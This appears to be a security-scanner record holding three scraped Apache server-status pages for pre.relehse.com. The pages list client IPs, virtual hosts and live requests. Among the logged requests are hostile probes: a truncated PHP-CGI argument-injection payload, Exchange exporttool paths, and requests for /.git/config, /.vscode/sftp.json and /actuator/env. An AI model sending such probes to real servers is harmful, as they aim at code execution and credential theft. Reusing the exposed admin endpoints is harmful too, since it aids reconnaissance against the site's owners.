0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/24/38775_ 13.33101163933880.00.661231.75 172.71.172.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/24/39439_ 13.322780200657560.01.441273.71 206.189.19.19http/1.1relehse.com:443GET /v2/_catalog HTTP/1.1 1-31031229510/15/39073_ 13.0827826193633510.00.191189.26 138.197.191.87http/1.1relehse.com:443GET /v2/_catalog HTTP/1.1 1-31031229510/19/38797_ 13.322780187586690.00.641125.68 206.189.19.19http/1.1relehse.com:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-31031229510/20/39630_ 13.0827826166002510.00.281223.05 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/18/40257_ 13.4300176043750.00.141205.06 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-31031229510/23/39361_ 13.33110213774950.01.071181.46 172.70.248.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31031229510/16/40008_ 13.431033166204010.00.871174.39 139.59.132.8http/1.1pre.relehse.com:443POST /api/gql HTTP/1.1 1-31031229510/20/38202_ 13.421135163883360.00.641091.09 139.59.132.8http/1.1pre.relehse.com:443POST /graphql HTTP/1.1 1-31031229510/19/39529_ 13.3200396913480.00.741096.06 206.189.19.19http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/67/35112_ 13.965504176170080.00.901034.79 172.70.215.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/75/34206_ 16.39427211391400.020.79980.33 139.59.132.8http/1.1pre.relehse.com:443GET /config.json HTTP/1.1 2-31031230830/72/34902_ 16.38929237916030.01.511056.93 139.59.132.8http/1.1pre.relehse.com:443GET /swagger/v1/swagger.json HTTP/1.1 2-31031230830/69/34113_ 15.469267165252530.09.04965.53 172.70.100.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/63/34452_ 16.3920134224960.01.281236.60 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-31031230830/59/34836_ 16.282780154352440.022.671030.60 206.189.19.19http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/63/34601_ 16.282780152709050.00.911041.29 206.189.19.19http/1.1relehse.com:443GET /login.action HTTP/1.1 2-31031230830/64/34491_ 16.38829162783160.02.511059.99 139.59.132.8http/1.1pre.relehse.com:443GET /actuator/env HTTP/1.1 2-31031230830/70/34846_ 16.04127156680900.02.101166.99 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31031230830/53/34800_ 15.4410184845390.02.191051.81 141.101.100.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31031229490/414/38849_ 33.3400232727130.09.251235.96 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-31031229490/407/37517_ 33.3400182418490.011.481100.44 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-31031229490/409/38542_ 33.3400193358140.010.771213.49 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 3-31031229490/402/37971_ 33.3500240475000.012.181239.00 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-31031229490/401/37904_ 33.3201163741650.038.931159.70 139.59.132.8http/1.1pre.relehse.com:443GET /images/.DS_Store HTTP/1.1 3-31031229490/422/37953_ 33.3400172375420.08.691170.29 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 3-31031229490/388/38207W 33.3400190144610.010.851280.82 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-31031229490/410/38257_ 33.3500271060650.06.921217.94 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-31031229490/391/37592_ 33.3410818069830.07.801207.54 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-31031229490/400/38729_ 33.3400313441130.013.341248.26 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-31031229500/488/33016_ 33.6610300836020.012.061051.67 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 4-31031229500/476/33096_ 33.65126142662650.012.041137.66 139.59.132.8http/1.1pre.relehse.com:443GET /.git/config HTTP/1.1 4-31031229500/456/33173_ 33.6710143568500.018.821151.60 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-31031229500/469/33517_ 33.6700158782480.023.971023.92 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-31031229500/482/32968_ 33.6700163350050.017.881040.31 159.65.18.197http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d77ec730
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 30-Sep-2025 13:36:56 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 99 Parent Server MPM Generation: 98 Server uptime: 18 days 15 minutes 53 seconds Server load: 1.28 1.48 1.34 Total accesses: 574393 - Total Traffic: 18.1 GB - Total Duration: 227727069 CPU Usage: u103.9 s80.86 cu2962.22 cs1631.51 - .307% CPU load .369 requests/sec - 12.2 kB/second - 33.1 kB/request - 396.466 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01352177no1yes19000 11352179no1yes010000 21352180no0yes010000 31352176no0yes010000 41352313no0yes010000 Sum502 149000 ___W______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-9813521770/368/12766_ 23.290053620800.011.56382.06 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-9813521770/433/12581_ 23.2822964700360.015.28406.27 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/update/289269 HTTP/1.1 0-9813521770/335/12999_ 23.281048832460.06.04508.45 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-9813521770/414/12861W 23.260044880740.07.36439.54 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-9813521770/361/12891_ 23.1708047596300.06.95382.35 143.110.217.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9813521770/425/13164_ 23.282060596110.011.16459.01 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-9813521770/351/13035_ 23.290055285870.06.11364.41 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-9813521770/397/12730_ 23.2002645606690.08.70375.78 80.67.100.226h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/395/12923_ 23.28211356272830.011.35422.72 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 0-9813521770/531/12746_ 23.281057814400.05.86401.90 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-9813521790/66/13219_ 10.96180233192100.01.69348.71 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/tree HTTP/1.1 1-9813521790/52/13800_ 10.9621839124510.00.85467.01 80.67.100.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/59/13436_ 10.942946124990.01.07347.59 143.110.217.244http/1.1 1-9813521790/55/13290_ 10.961035270470.01.95383.74 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-9813521790/62/13735_ 10.962033282430.00.72357.82 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-9813521790/60/14261_ 10.9322436625790.00.77438.44 143.110.217.244http/1.1 1-9813521790/57/13822_ 10.963255128560.01.09455.84 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-9813521790/102/14317_ 10.91320639460380.02.05413.52 171.61.68.174http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-9813521790/55/12839_ 10.9619736406190.01.80341.98 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 1-9813521790/79/13805_ 10.962028087590.00.97297.77 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-9813521800/145/7929_ 18.08399241635670550.03.55233.46 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/122/7527_ 18.332605431334650.010.58280.16 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/144/7966_ 18.42399050443100.016.60291.36 162.158.122.120h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/135/7688_ 18.29424150680290.01.91302.70 143.110.217.244http/1.1 2-9813521800/124/7863_ 18.4733639726796360.04.07353.08 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 2-9813521800/143/7758_ 18.502652026202980.09.66279.91 88.5.225.45h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/156/8090_ 18.473351333456310.02.95242.00 136.226.214.114http/1.1relehse.com:443GET /admin/requirements/289310/showNoticeEvaluateds?draw=1&colu 2-9813521800/155/7648_ 18.45260038479210.014.18260.77 207.154.197.113http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/153/7864_ 18.44330031657580.01.62251.93 188.114.111.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/138/7875_ 18.33330057006730.017.09303.84 172.64.238.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/28/12860_ 10.03317040020430.00.22415.44 172.68.175.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/27/12553_ 10.04328040773210.00.17414.20 172.68.175.51h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/22/13094_ 10.273221938524800.00.29426.42 136.226.214.114http/1.1relehse.com:443GET /admin/requirements/289311/showNoticeEvaluateds?draw=1&colu 3-9813521760/23/12535_ 10.2732340541708480.021.65382.84 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 3-9813521760/23/12588_ 10.312281245574440.00.76425.13 136.226.214.114http/1.1relehse.com:443GET /admin/requirements/289313/showNoticeEvaluateds?draw=1&colu 3-9813521760/21/12854_ 10.23317039653470.00.26432.14 162.158.123.125h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/24/12829_ 10.21223032459380.00.27425.63 162.158.120.154h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-9813521760/23/13097_ 10.2622344100574690.00.46354.33 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/24/12533_ 10.03327055614340.00.10416.09 104.23.160.25h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-9813521760/20/13563_ 10.3122929058521110.00.30399.09 136.226.214.114http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 4-9813523130/394/10275_ 33.70142109267370800.060.76407.68 2.136.78.3h2relehse.com:443done, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-9813523130/415/9932_ 33.771441551634320.044.74387.76 88.5.225.45h2relehse.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-9813523130/437/10434_ 33.761472141467740.07.80356.33 80.67.100.226h2relehse.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 4-9813523130/476/10640_ 33.7614410947161040.016.97376.00 88.5.225.45h2relehse.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-9813523130/370/10209_ 33.701384539031350.08.82271.57 2.136.78.3h2relehse.com:443done, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 4-981352313
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27e3d42ea2
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 30-Sep-2025 05:23:07 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 99 Parent Server MPM Generation: 98 Server uptime: 17 days 16 hours 2 minutes 4 seconds Server load: 1.04 1.05 1.02 Total accesses: 563982 - Total Traffic: 17.7 GB - Total Duration: 220926098 CPU Usage: u37.38 s50.27 cu2962.22 cs1631.51 - .307% CPU load .369 requests/sec - 12.2 kB/second - 32.9 kB/request - 391.725 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01352177no0yes010000 11352179no0yes010000 21352180no1yes010000 31352176no0yes010000 41352313no1yes19000 Sum502 149000 ___________________________________________W______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-9813521770/0/12398_ 0.002192551708860.00.00370.50 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/1/12149_ 0.152191863154940.00.01391.00 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-9813521770/0/12664_ 0.0046144647876470.00.00502.41 104.23.239.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/0/12447_ 0.0046139343833410.00.00432.18 172.70.174.226h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/1/12531_ 0.084611845960700.00.01375.41 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-9813521770/0/12739_ 0.007022059246550.00.00447.84 172.64.236.23h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/1/12685_ 0.00702054049490.00.00358.30 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-9813521770/0/12333_ 0.0021936743552920.00.00367.07 172.68.65.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/0/12528_ 0.007411454682250.00.00411.37 162.158.122.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9813521770/0/12215_ 0.007411155652700.00.00396.05 172.69.157.142http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/1/13154_ 0.026422133008390.00.01347.03 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-9813521790/0/13748_ 0.0074128938900800.00.00466.16 172.69.74.234h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-9813521790/0/13377_ 0.0074176445975960.00.00346.52 172.71.164.82h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/0/13235_ 0.00741035087240.00.00381.79 104.23.195.81h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/0/13673_ 0.00741033148750.00.00357.09 104.23.195.98h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/0/14201_ 0.00635036484090.00.00437.67 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-9813521790/0/13765_ 0.00635154994730.00.00454.74 172.69.74.238h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/1/14216_ 0.036401539424680.00.00411.47 162.158.122.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9813521790/0/12784_ 0.006411636126930.00.00340.18 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 1-9813521790/0/13726_ 0.006411927926890.00.00296.81 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 2-9813521800/6/7790_ 0.27445233979380.00.48230.39 143.110.213.72http/1.1 2-9813521800/2/7407_ 0.311030827610.00.00269.59 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-9813521800/1/7823_ 0.28455626202130.00.03274.79 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-9813521800/2/7555_ 0.2015050212220.00.03300.82 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 2-9813521800/3/7742_ 0.291235526318460.00.03349.04 172.71.23.160h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/1/7616_ 0.2179625560500.00.01270.26 45.61.186.218http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/1/7935_ 0.266132970280.00.00239.05 172.64.236.40h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9813521800/3/7496_ 0.1961937700850.00.01246.60 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 2-9813521800/0/7711_ 0.005031036540.00.00250.31 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-9813521800/1/7738_ 0.235056419360.00.00286.75 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-9813521760/0/12832_ 0.00741039994970.00.00415.22 172.68.38.138http/1.1 3-9813521760/0/12526_ 0.0051940739310.00.00414.03 143.110.213.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-9813521760/0/13072_ 0.00741038499180.00.00426.12 172.68.38.138http/1.1 3-9813521760/0/12512_ 0.007412241676630.00.00361.19 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 3-9813521760/0/12565_ 0.0074154645561310.00.00424.37 172.69.58.24h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/0/12833_ 0.00741039588290.00.00431.87 162.158.252.132http/1.1 3-9813521760/0/12805_ 0.007411632405200.00.00425.35 172.70.159.133http/1.1 3-9813521760/0/13074_ 0.007410100541230.00.00353.88 172.68.221.139http/1.1 3-9813521760/0/12509_ 0.00741055591010.00.00415.99 172.69.147.134http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9813521760/0/13543_ 0.00741158457540.00.00398.79 104.23.213.190http/1.1 4-9813523130/12/9893_ 0.711065688600.00.12347.03 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-9813523130/14/9531_ 0.720049263640.00.14343.17 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-9813523130/16/10013_ 0.700039701720.00.67349.20 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-9813523130/12/10176W 0.700045314510.00.43359.45 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-9813523130/9/9848_ 0.662137206950.00.08262.83 143.110.213.72http/1.1 4-9813523130/9/9613_ 0.700048660600.00.05398.03 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-9813523130/12/10274_ 0.712062599100.00.09391.28 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-9813523130/11/9800_ 0.702035412440.00.30340.85 143.110.213.72http/1.17f7ffb32-1f6e
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d001709a
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 28-Sep-2025 19:36:46 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 91 Parent Server MPM Generation: 90 Server uptime: 16 days 6 hours 15 minutes 43 seconds Server load: 0.98 0.89 0.90 Total accesses: 520905 - Total Traffic: 16.2 GB - Total Duration: 206426468 CPU Usage: u73.7 s72.69 cu2685.92 cs1480.36 - .307% CPU load .371 requests/sec - 12.1 kB/second - 32.5 kB/request - 396.284 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03401810no0yes010000 13401811no1yes19000 23401809no0yes010000 33401942no3yes010002 43401812no1yes010000 Sum505 149002 _________________W________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-9034018100/20/10736_ 8.9578431046021570.00.76320.69 162.158.129.247h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/10/10590_ 8.012192158466450.00.16313.03 103.196.9.105http/1.1 0-9034018100/16/11096_ 9.047902243766880.00.07416.09 162.158.120.219h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/12/10768_ 8.919031538224220.00.11317.02 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 0-9034018100/13/10945_ 8.73784039438150.00.38332.11 104.164.173.220http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/13/11200_ 8.847851353387670.00.23410.04 104.164.173.220http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/19/11098_ 8.9378539049129000.00.14278.22 172.69.9.113h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/8/10798_ 9.232221036782690.00.03310.76 103.196.9.105http/1.1cinre-backend.tandemhse.com:443GET /assets/vue.runtime.esm-bundler-5xC1UApn.js HTTP/1.1 0-9034018100/23/10960_ 9.0578948548520690.01.24317.14 162.158.123.49h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-9034018100/12/10633_ 9.00904049628080.00.43353.24 37.60.141.156http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-9034018110/197/12051_ 15.671029133720.02.63309.90 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-9034018110/200/12561_ 15.631035821050.02.32419.57 139.59.231.238h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9034018110/211/12205_ 15.624035683250.02.23309.88 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-9034018110/235/12080_ 15.663031813240.03.45332.84 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-9034018110/212/12520_ 15.664029525610.03.35330.54 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-9034018110/219/13097_ 15.66338432445910.04.21411.00 104.23.217.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-9034018110/190/12601_ 15.663052166940.03.40410.93 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-9034018110/214/13062W 15.580036387670.03.64391.63 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-9034018110/207/11612_ 15.670032990280.02.93318.06 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-9034018110/221/12567_ 15.553024586300.04.39275.69 139.59.231.238http/1.1 2-9034018090/11/7606_ 8.061489033584830.00.21226.51 103.196.9.92http/1.1 2-9034018090/10/7220_ 8.1114942230494260.00.03264.43 103.196.9.92http/1.1cinre-viewer.tandemhse.com:443GET /_nuxt/Ctimh5Vr.js HTTP/1.1 2-9034018090/12/7639_ 8.061492225753130.00.30271.00 103.196.9.92http/1.1 2-9034018090/13/7374_ 8.06784049845160.00.39277.77 172.69.5.135h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-9034018090/11/7565_ 6.936920126098720.00.02346.65 199.45.154.120http/1.1done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-9034018090/17/7411_ 8.3179051025265270.00.59266.16 188.114.111.21h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/15/7726_ 8.507569532651260.00.53234.56 172.69.17.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/12/7307_ 8.121492137291470.00.07243.43 103.196.9.92http/1.1cinre-viewer.tandemhse.com:443GET /_nuxt/BWnU2rFv.js HTTP/1.1 2-9034018090/10/7525_ 8.0670030644430.00.07246.94 172.69.5.134h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-9034018090/11/7553_ 7.217843256018560.00.05270.89 199.45.154.120http/1.1pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9034019420/485/12171_ 23.670038413150.012.39389.38 139.59.231.238http/1.1 3-9034019420/466/11855_ 23.731039069640.012.07385.74 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-9034019420/481/12400_ 23.600136653590.016.73394.69 139.59.231.238h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9034019420/485/11875_ 23.670040140020.013.28341.60 139.59.231.238h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-9034019420/502/11935_ 23.732043812920.029.87397.05 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-9034019420/492/12133_ 23.600038005010.024.45388.33 139.59.231.238h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-9034019420/517/12092_ 23.732030897310.019.42413.23 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-9034019420/535/12415_ 23.730098862250.09.59335.27 139.59.231.238http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-9034019420/499/11853_ 23.72538151745110.012.69377.71 172.71.130.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-9034019420/484/12868_ 23.67188156919500.09.09379.53 172.68.3.23http/1.1 4-9034018120/21/9190_ 9.099063080020.00.28331.64 172.70.144.53h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-9034018120/26/8804_ 8.6010046107290.00.64306.38 172.69.5.143h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-9034018120/26/9322_ 9.151440637818570.00.27332.02 172.68.245.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-9034018120/23/9477_ 9.07103942517190.00.68333.78 217.114.43.74http/1.1 4-9034018120/24/9152_ 9.0310035120620.00.86248.99 162.158.22.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-9034018120/23/8895_ 9.064046576070.00.41384.13 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 4-9034018120/23/9588_ 